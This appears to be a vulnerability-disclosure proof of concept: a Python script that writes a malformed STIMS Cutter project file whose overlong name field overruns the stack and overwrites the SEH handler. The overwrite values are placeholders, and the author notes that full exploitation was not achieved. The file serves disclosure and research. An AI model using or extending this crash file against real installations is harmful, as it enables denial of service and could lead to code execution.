# Exploit Title: STIMS CUTTER OVERFLOW SEH OVERWRITE # Date: 19 Feb 2016 # Exploit Author: Shantanu Khandelwal > # Vendor Homepage: http://www.stimslabs.com/ # Software Link: http://www.stimslabs.com/en/cutter/STIMSCutterEnSetup.exe # Version: # Tested on: Windows XP SP3 # CVE : UNKNOWN # ==============HOW TO CRASH ================== #make the cutt file and open it it the STIMS Cutter application. #Click on Build Report #=========================================== #Problems in exploitation #Unable to find suitable SEH pointer # #!/usr/bin/env python f=open("crash.cutt","w") payload = """ [solution] name=""" payload+="A"*8452 payload +="BBBB" #SEH overwrite payload +="""CCCC desc=A time=0 version=1 file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt time.created=131003117142810000 app=1.1.3 projects=1 [properties] optimize=0 level=0 diversity=0 status=0 active=1 remnants=0 sort=0 version=1 desc=S comment= comment.active=0 notes= notes.active=0 material=A progress=100 calculation=0D99FF12 cost=222.000 time.gone=0 time.date=2016 Feb 18 23.29.14 payload=2 file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt app=1.1.3 [order.blanks] b001={ "uid": "908113387", "material": "A", "length": "222", "quantity": "1", "knife": "1", "indent": "11", "cost": "1.0", "comment": "1", "id": "1", "name": "a" } [order.pieces] p001={ "uid": "124270241", "material": "A", "length": "111", "quantity": "1", "label": "1", "comment": "1", "id": "1", "name": "a", "orphans": "0" } [layout.summary] summary={ "output": "112.000", "used.len": "222.000", "used": "1", "pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "remnants": "0.000", "srest": "110.000", "cost": "222.000", "cost.ppu": "1.982", "brest": "110.0", "status": "", "type": "summary", "time.gone": "0", "time.date": "2016 Feb 18 23.29.14" } blank01={ "name": "a", "cost": "1.000000", "blank": "1", "used": "1", "pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "output": "112.000", "used.len": "222.000", "cost.sum": "222.000", "cost.ppu": "1.982", "remnants": "0.000" } [layout.cuttings] c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1", "shifts": "1", "output": "#1 1", "layout": "111" } [layout.cuttings.parts] c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1", "shifts": "1", "output": "#1 1", "layout": "111", "name": "1" } """ f.write(payload) f.close()